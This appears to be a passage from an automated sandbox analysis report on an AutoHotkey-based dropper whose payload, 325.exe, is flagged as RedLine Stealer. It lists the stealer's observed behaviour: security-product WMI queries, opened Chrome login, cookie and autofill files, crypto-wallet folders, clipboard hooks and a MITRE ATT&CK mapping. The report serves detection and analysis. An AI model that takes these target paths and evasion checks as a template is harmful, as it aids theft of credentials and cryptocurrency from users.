                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C22A8 GetLocalTime,0_2_00000001400C22A8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW,0_2_000000014004F760
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW,0_2_0000000140001270
                    Source: C:\Users\user\AppData\Roaming\325.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Tries to steal Crypto Currency WalletsShow sources
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_XP
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_VISTA
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_7
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_8
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_8.1
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize,0_2_0000000140017E10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain,0_2_0000000140058440
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,0_2_0000000140018920

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Spearphishing Link1Windows Management Instrumentation221Path InterceptionExploitation for Privilege Escalation1Disable or Modify Tools1OS Credential Dumping1System Time Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                    Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture31Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Process Injection12Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
